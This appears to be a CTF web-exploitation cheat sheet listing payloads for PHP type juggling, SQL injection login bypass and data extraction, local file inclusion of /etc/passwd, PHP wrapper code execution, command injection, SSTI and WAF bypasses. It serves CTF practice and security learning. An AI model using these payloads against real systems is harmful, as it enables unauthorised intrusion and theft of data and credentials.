Skip to content
CTF

Web Application Pentesting

Common web vulnerabilities and exploitation techniques for CTF

CTF Web Exploitation Reference

Focused reference for web challenges in CTF competitions.

Initial Enumeration

BASH 
# First steps
curl -I https://target.com          # Headers
curl https://target.com/robots.txt  # Disallowed paths
curl https://target.com/.git/HEAD   # Git exposure

# Source code analysis
View Page Source (Ctrl+U)
Check JavaScript files
Look for comments

PHP Specific

Type Juggling

PHP 
# Loose comparison (==) vulnerabilities
"0e123" == "0e456"   # TRUE (scientific notation)
0 == "string"        # TRUE
"10" == 10          # TRUE

# Bypass: ?password=0 when checking against "0e..." hash

Magic Hash Collisions

TEXT 
# MD5 hashes starting with 0e (all evaluate to 0)
2406107080e462097431906509019562988736854
QNKCDZO0e830400451993494058024219903391
s878926199a0e545993274517709034328855841020

Array Injection

PHP 
# strcmp() returns NULL on array input
strcmp($_GET['pass'], 'secret')
# Bypass: ?pass[]=anything

# MD5 array bypass
md5($_GET['x']) == md5($_GET['y'])
# Bypass: ?x[]=a&y[]=b (both return NULL)

Dangerous Functions

PHP 
eval()           # Code execution
system()         # Command execution
assert()         # Code execution in PHP5
preg_replace()   # RCE with /e modifier (old PHP)
unserialize()    # Object injection
include()        # LFI/RFI

SQL Injection

Authentication Bypass

SQL 
admin' --
admin' #
' OR '1'='1' --
' OR 1=1 --
admin'/*

Data Extraction

SQL 
' UNION SELECT 1,2,3 --
' UNION SELECT null,table_name,null FROM information_schema.tables --
' UNION SELECT null,column_name,null FROM information_schema.columns WHERE table_name='users' --

Local File Inclusion

Basic LFI

TEXT 
?page=../../../etc/passwd
?page=....//....//....//etc/passwd
?page=..%2f..%2f..%2fetc/passwd

PHP Wrappers

TEXT 
# Base64 encode source
?page=php://filter/convert.base64-encode/resource=index.php

# Execute code (if allow_url_include=On)
?page=php://input
POST: <?php system('id'); ?>

# Data wrapper
?page=data://text/plain,<?php system('id'); ?>
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==

Command Injection

BASH 
; id
| id
|| id
& id
&& id
`id`
$(id)

# Bypass spaces
cat${IFS}/etc/passwd
cat$IFS/etc/passwd
{cat,/etc/passwd}

SSTI Detection

TEXT 
{{7*7}}        # Jinja2/Twig → 49
${7*7}         # FreeMarker → 49
<%= 7*7 %>     # ERB → 49
#{7*7}         # Thymeleaf → 49

Flag Discovery

BASH 
# Common locations
/flag, /flag.txt, /home/*/flag*
./flag, ../flag, ../../flag

# Environment variable
{{config}}, ${env}, printenv

# Database
' UNION SELECT flag FROM flags --

Useful Bypasses

Extension Bypass

TEXT 
.php.phtml, .php5, .phar
.php.php%00.jpg (null byte, old PHP)
.php.PhP (case)

WAF Bypass

TEXT 
# Spaces
%09, %0a, +, /**/

# Keywords
SeLeCt, UN/**/ION, concat()
Back to Cheatsheets
On this page